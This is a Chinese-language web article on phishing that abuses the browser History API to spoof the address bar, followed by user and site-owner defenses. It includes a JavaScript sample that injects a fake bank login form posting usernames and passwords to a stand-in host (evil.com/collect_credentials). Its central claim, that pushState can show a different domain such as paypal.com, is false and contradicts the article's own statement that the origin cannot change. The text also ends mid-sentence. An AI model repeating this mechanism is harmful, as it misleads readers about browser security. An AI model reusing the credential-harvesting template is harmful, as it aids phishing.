登录
首页 >  文章 >  前端

HTML历史记录漏洞分析:historyAPI钓鱼攻击手法

时间:2025-12-02 11:04:48 291浏览 收藏

本篇文章给大家分享《HTML历史记录漏洞利用分析:通过history API钓鱼攻击》,覆盖了文章的常见基础知识,其实一个语言的全部知识点一篇文章是不可能说完的,但希望通过这些问题,让读者对自己的掌握程度有一定的认识(B 数),从而弥补自己的不足,更好的掌握它。

利用History API进行钓鱼攻击,核心是通过history.pushState()或replaceState()在不刷新页面的情况下伪造地址栏URL,使恶意页面显示为合法网站,从而诱骗用户输入敏感信息。

HTML浏览器历史记录漏洞怎么利用_通过historyAPI进行钓鱼漏洞利用分析

利用HTML浏览器历史记录漏洞进行钓鱼,主要是通过滥用History API来篡改或伪造浏览器地址栏显示,诱导用户点击或输入敏感信息,这本质上是一种视觉欺骗。攻击者可以在不刷新页面的情况下,改变浏览器地址栏中显示的URL,使其看起来像一个合法网站,但实际内容却是恶意页面。

解决方案

要利用HTML浏览器历史记录漏洞进行钓鱼,核心思路是利用history.pushState()history.replaceState()方法来动态修改浏览器地址栏的URL,而无需进行页面跳转或刷新。这使得攻击者可以在自己的恶意页面上,伪装成任何他们想要的合法网站URL,从而欺骗用户。

具体操作流程通常是这样的:

  1. 诱导用户访问攻击者的页面: 攻击者首先需要通过各种手段(如邮件、社交媒体、短信等)诱导受害者点击一个链接,该链接指向攻击者控制的网站(例如 evil.com/phish.html)。
  2. 加载恶意内容: 当用户访问 evil.com/phish.html 后,该页面会加载并显示一个精心制作的、与目标合法网站(如银行、支付平台、社交媒体等)高度相似的登录界面或信息输入页面。
  3. 篡改地址栏URL: 在页面加载完成后,通过JavaScript执行history.pushState()history.replaceState()方法,将浏览器地址栏中显示的URL修改为目标合法网站的URL。例如,如果目标是PayPal的登录页,攻击者会执行类似 history.pushState({}, "", "https://www.paypal.com/login"); 的代码。
    • history.pushState() 会在浏览器历史记录中添加一个新的条目,并将地址栏URL更新为指定值。
    • history.replaceState() 则会替换当前的历史记录条目,更新地址栏URL。
    • 重要的是,这些操作不会触发页面重新加载,也不会改变页面的实际来源(origin)。页面内容仍然是由 evil.com 提供。
  4. 收集用户凭据: 用户看到地址栏显示的是 https://www.paypal.com/login,并且页面内容也和PayPal登录页一模一样,很容易信以为真,进而输入自己的用户名和密码。这些输入的敏感信息实际上会被提交到攻击者预设的后端服务器(例如 evil.com/collect_credentials),而不是真正的PayPal服务器。

这是一个简单的JavaScript代码示例,展示了如何在攻击者页面上伪造URL:

// 假设这是攻击者控制的页面 (e.g., evil.com/phish.html)
window.onload = function() {
    // 伪造地址栏URL,使其看起来像一个合法网站的登录页
    // 注意:这里的URL只是显示在地址栏,实际页面的源仍然是evil.com
    history.pushState({}, "", "https://www.examplebank.com/login");

    // 接下来,攻击者会在这里插入一个看起来和目标银行一模一样的HTML登录表单
    // 这个表单的action属性会指向攻击者自己的服务器来收集凭据
    document.body.innerHTML = `
        <div style="font-family: Arial, sans-serif; text-align: center; padding: 50px;">
            <img src="https://via.placeholder.com/150x50?text=BankLogo" alt="Bank Logo" style="margin-bottom: 20px;">
            <h2>网上银行登录</h2>
            <form action="https://evil.com/collect_credentials" method="POST" style="border: 1px solid #ccc; padding: 30px; display: inline-block; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1);">
                <div style="margin-bottom: 15px;">
                    <label for="username" style="display: block; text-align: left; margin-bottom: 5px;">用户名:</label>
                    &lt;input type=&quot;text&quot; id=&quot;username&quot; name=&quot;username&quot; required style=&quot;width: 250px; padding: 10px; border: 1px solid #ddd; border-radius: 4px;&quot;&gt;
                </div>
                <div style="margin-bottom: 20px;">
                    <label for="password" style="display: block; text-align: left; margin-bottom: 5px;">密码:</label>
                    &lt;input type=&quot;password&quot; id=&quot;password&quot; name=&quot;password&quot; required style=&quot;width: 250px; padding: 10px; border: 1px solid #ddd; border-radius: 4px;&quot;&gt;
                </div>
                <button type="submit" style="background-color: #007bff; color: white; padding: 10px 20px; border: none; border-radius: 4px; cursor: pointer;">登录</button>
            </form>
            <p style="margin-top: 20px; font-size: 0.9em; color: #666;">忘记密码? | 注册新用户</p>
        </div>
    `;
};

这段代码展示了如何通过JavaScript在页面加载后,立即将浏览器地址栏的URL修改为 https://www.examplebank.com/login,同时页面内容显示一个伪造的银行登录界面。用户在输入用户名和密码后,这些信息将被提交到 https://evil.com/collect_credentials

History API如何被滥用进行地址栏伪造,其核心机制是什么?

History API,特别是pushState()replaceState()这两个方法,被滥用进行地址栏伪造的核心机制在于它们允许开发者在不触发浏览器完整页面加载的情况下,修改浏览器地址栏中显示的URL,并同时更新浏览器的历史记录。在我看来,这正是其“双刃剑”特性所在,为现代单页应用(SPA)提供了流畅的用户体验,却也为恶意行为打开了一扇窗。

具体来说:

  1. 不刷新页面改变URL: 这是关键。传统的页面导航会触发完整的HTTP请求和页面刷新。而pushState()replaceState()则允许JavaScript在当前页面的上下文中,仅更新地址栏显示的URL。这意味着,页面的实际内容、脚本执行环境以及同源策略(Same-Origin Policy)所基于的“源”(协议、域名、端口)并不会改变。页面仍然运行在最初加载的那个域上,只是地址栏“看起来”变了。
  2. 同源策略的“盲区”: 浏览器严格遵守同源策略,防止不同源的脚本互相访问数据。但是,history.pushState()history.replaceState()被设计为允许当前页面的脚本修改其自身的URL路径、查询参数和哈希部分,甚至可以指定一个完全不同的URL路径和查询参数,只要不改变其“源”即可。钓鱼攻击正是利用了这一点:攻击者在自己的域名下,将地址栏URL伪装成目标网站的URL,但页面的实际源并未改变。用户看到的URL是https://www.target.com/login,但如果他们仔细检查,会发现SSL证书是属于攻击者域名的,或者通过开发者工具会发现页面的实际源是https://evil.com
  3. 用户信任的利用: 多数用户在访问网站时,习惯性地只看地址栏的域名部分来判断网站的真伪。当地址栏显示一个他们信任的域名时,他们往往会放松警惕。History API的滥用正是利用了这种用户习惯,通过视觉上的欺骗来绕过用户的安全意识。

这种机制的巧妙之处在于,它利用了浏览器提供的合法功能,但将其用于非预期的恶意目的。它没有突破浏览器的安全模型,而是利用了用户对地址栏显示的URL的信任和不仔细核查的习惯。

用户如何识别并防范利用History API进行的钓鱼攻击?

识别和防范利用History API进行的钓鱼攻击,在我看来,需要用户保持高度警惕和一些基本的安全习惯。毕竟,这种攻击手法本质上是一种视觉欺骗,只要我们能看穿它的“障眼法”,就能有效避免上当。

以下是一些实用的识别和防范策略:

  1. 仔细核查SSL证书信息: 这是最直接也最有效的方法。
    • 点击地址栏的“锁”图标: 即使地址栏显示了你熟悉的域名(比如 paypal.com),也一定要点击浏览器地址栏左侧的锁形图标。
    • 检查证书颁发者和域名: 弹出的证书信息应该显示该网站的SSL证书是颁发给 你期望访问的那个域名 的。如果地址栏显示 paypal.com,但证书信息却显示颁发给 evil.com 或其他不相关的实体,那么这几乎可以肯定是一个钓鱼网站。这是History API钓鱼最难绕过的一道防线。
  2. 警惕URL的异常行为:
    • URL突变: 如果你点击一个链接后,页面加载过程中或加载完成后,地址栏的URL突然从一个看起来正常的URL(比如 shorturl.com/xyz)变成了另一个看起来正常的URL(比如 bank.com/login),并且没有明显的页面刷新或跳转动画,这可能就是History API在作祟。
    • URL与内容不符: 地址栏显示的是A网站,但页面内容看起来像是B网站,或者页面的视觉风格、交互方式与你熟悉的A网站有细微差别,都需要立即警惕。
  3. 不要直接点击可疑链接: 对于通过邮件、短信、社交媒体等渠道收到的要求输入敏感信息的链接,尤其要保持警惕。
    • 手动输入URL: 对于银行、支付平台、邮箱等重要网站,养成手动在浏览器地址栏输入其官方网址的习惯,而不是点击任何来源的链接。
    • 使用书签: 将常用且重要的网站添加到浏览器书签中,通过书签访问可以大大降低点击钓鱼链接的风险。
  4. 启用多因素认证(MFA): 即使不小心在钓鱼网站上输入了密码,如果你的账户启用了MFA,攻击者没有第二因素(如手机验证码、指纹等),也无法成功登录你的账户,这提供了额外的安全保障。
  5. 使用浏览器安全扩展: 部分浏览器安全扩展(如反钓鱼插件、广告拦截器等)能够识别并警告用户访问已知的恶意网站或可疑页面行为。
  6. 保持软件更新: 操作系统、浏览器和安全软件的及时更新,可以修补已知的安全漏洞,提升整体防御能力。

在我看来,用户教育是防范这类攻击的基石。了解攻击原理,并培养“多看一眼”的习惯,远比依赖单一的技术防护措施更可靠。

History API滥用钓鱼的局限性与更深层次的防御策略

History API滥用进行钓鱼攻击,虽然在视觉欺骗上效果显著,但它并非没有局限性。同时,为了更全面地防御这类以及其他形式的钓鱼攻击,我们需要从多个层面部署更深层次的防御策略。

History API滥用钓鱼的局限性:

  1. 同源策略的“硬约束”: 尽管pushState可以改变显示的URL,但它无法改变页面的实际“源”(Origin)。这意味着,页面的实际加载仍然来自于攻击者的域名。浏览器在处理网络请求、Cookie、本地存储以及其他安全敏感操作时,仍然会基于页面的真实源。例如,一个伪装成paypal.com的页面,其表单提交的action属性仍然会指向evil.com的服务器,而不是真正的paypal.com。用户如果查看页面源代码或通过开发者工具的网络请求,就能发现这些异常。
  2. SSL证书的“照妖镜”: 这是最关键的局限。攻击者无法为paypal.com这样的合法域名获取SSL证书(除非他们控制了该域名)。因此,当用户点击地址栏的“锁”图标检查SSL证书时,会发现证书是颁发给evil.com或其他不相关的域名,而非paypal.com。这种不匹配是识别History API钓鱼的决定性证据。
  3. 依赖用户疏忽: 这种攻击的成功率高度依赖于用户的警惕性不足。一旦用户养成了核查SSL证书和URL真实来源的习惯,这种攻击的有效性就会大打折扣。
  4. 浏览器UI的潜在改进: 随着安全意识的提高,浏览器厂商可能会在未来引入更明确的UI提示,例如在URL被pushState修改后,在地址栏旁边显示实际的Origin,或者对这种行为发出更显眼的警告,从而进一步降低其欺骗性。

更深层次的防御策略:

从网站所有者、浏览器厂商和用户教育三个层面,我们可以构建更强大的防御体系。

对于网站所有者:

  • 实施HSTS (HTTP Strict Transport Security): 强制浏览器始终通过HTTPS连接访问你的网站。虽然不能直接阻止History API钓鱼,但它确保了所有与你网站的真实交互都是加密且经过身份验证的,减少了中间人攻击的可能性。
  • 严格的Content Security Policy (CSP): CSP可以限制页面可以加载的资源(脚本、样式、图片等)的来源,并限制内联脚本的执行。如果你的网站存在XSS漏洞,攻击者可能通过注入恶意脚本来执行pushState钓鱼。一个严格的CSP可以有效缓解XSS攻击,从而间接防止History API的滥用。
  • X-Frame-Options 或 CSP: frame-ancestors: 阻止你的网站被嵌入到恶意网站的